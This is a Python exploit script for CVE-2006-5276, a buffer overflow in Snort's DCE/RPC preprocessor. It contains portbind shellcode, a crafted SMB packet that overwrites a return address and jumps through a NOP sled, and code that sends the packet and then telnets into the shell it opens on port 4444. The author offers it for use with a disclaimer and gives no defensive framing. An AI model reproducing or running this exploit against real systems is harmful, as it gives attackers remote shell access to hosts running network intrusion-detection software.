#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from scapy import *

# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode  = &quot;\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96&quot;
shellcode += &quot;\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56&quot;
shellcode += &quot;\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1&quot;
shellcode += &quot;\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0&quot;
shellcode += &quot;\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53&quot;
shellcode += &quot;\x89\xe1\xcd\x80&quot;

def ExploitSnort(target):
       # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
       # NetBIOS Session Service
       smbreq = &quot;\x00\x00\x02\xab&quot;

       # SMB Header
       smbreq += &quot;\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00&quot;
       smbreq += &quot;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe&quot;
       smbreq += &quot;\x00\x08\x30\x00&quot;

       # Tree Connect AndX Request
       smbreq += &quot;\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00&quot;
       smbreq += &quot;\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00&quot;
       smbreq += &quot;\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00&quot;
       smbreq += &quot;\x3f\x3f\x3f\x3f\x3f\x00&quot;

       # NT Create AndX Request
       smbreq += &quot;\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00&quot;
       smbreq += &quot;\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&quot;
       smbreq += &quot;\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00&quot;
       smbreq += &quot;\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00&quot;
       smbreq += &quot;\x63\x00\x00\x00&quot;

       # Write AndX Request #1
       smbreq += &quot;\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80&quot;
       smbreq += &quot;\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee&quot;
       smbreq += &quot;\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00&quot;
       smbreq += &quot;\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00&quot;
       smbreq += &quot;\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88&quot;
       smbreq += &quot;\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00&quot;
       smbreq += &quot;\x2b\x10\x48\x60\x02\x00\x00\x00&quot;

       # Write AndX Request #2
       smbreq += &quot;\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80&quot;
       smbreq += &quot;\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee&quot;
       smbreq += &quot;\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44&quot;
       smbreq += &quot;\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9&quot;
       # The following address overwrites RET and points into our shellcode
       smbreq += struct.pack('&lt;L', 0xbfffeff0)
       smbreq += '\x90' * 50
       smbreq += shellcode
       smbreq += '\x90' * 130

       packet = IP(dst=target) / TCP(sport=1025, dport=139, flags=&quot;PA&quot;) / smbreq
       send(packet)

def ConnectRemoteShell(target):
       connect = '/usr/bin/telnet ' + target + ' 4444'
       os.system(connect)

if __name__ == '__main__':
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s &lt;ip of a host on snort network&gt;' % sys.argv[0]
               sys.exit(-1)

       print '[+] Sending malformed SMB packet'
       ExploitSnort(target)
       print '[+] Connecting to remote shell in 3 seconds...'
       time.sleep(3)
       ConnectRemoteShell(target)

